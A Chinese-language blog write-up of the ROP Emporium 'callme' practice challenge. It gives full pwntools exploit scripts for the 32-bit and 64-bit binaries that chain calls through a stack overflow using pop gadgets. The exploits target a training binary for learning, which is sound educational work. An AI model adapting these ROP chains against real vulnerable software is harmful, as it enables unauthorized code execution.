这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录
因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。
题目链接:https://ropemporium.com/challenge/callme.html
备注:以下题目都是在ubuntu16.04下完成
32位
这道题主要考逆向。
程序有个栈溢出漏洞,要利用这个漏洞按顺序执行call_one、call_two、call_three这三个函数。同时,这三个函数的参数可以从.so文件逆向得出来。(虽然题目也说了)
另外,需要注意的是我们要传入三个参数,所以需要手动模拟栈的操作,传完参数后需要pop 3次。所以需要找个pop3次,ret的gadget。
所以最后的exp是这样的:
from pwn import *
p = process("./callme32")
one_addr = 0x080484f0
two_addr = 0x08048550
three_addr = 0x080484e0
pop_ret = 0x080487f9
payload = "a" *44 + p32(one_addr)+p32(pop_ret) + p32(0xDEADBEEF)+p32(0xCAFEBABE)+p32(0xD00DF00D)
payload += p32(two_addr) + p32(pop_ret) + p32(0xDEADBEEF) + p32(0xCAFEBABE) + p32(0xD00DF00D)
payload += p32(three_addr) + p32(pop_ret) + p32(0xDEADBEEF) + p32(0xCAFEBABE) + p32(0xD00DF00D)
p.sendline(payload)
p.interactive()
最后运行结果:
64位
和前面一样,反汇编下call_one, call_two, call_three这三个函数。
和32位不一样的地方还是传参的地方。当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
因为这次有三个参数,所以需要找有pop这三个寄存器rdi,rsi,rdx的gadget。
exp如下:
from pwn import *
p = process("./callme")
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
pop_ret = 0x40093c
payload = "A" *40 + p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(one_addr)
payload += p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(two_addr)
payload += p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(three_addr)
p.sendline(payload)
p.interactive()
运行结果:
中间还遇到一个小问题,错把下面的offset当成call_one的地址了。
找到的过程是用gdb调试core文件发现的。看到这里说602040的地址是非法的。仔细检查了一下才发现搞错地址了。
总结:遇到问题多调试。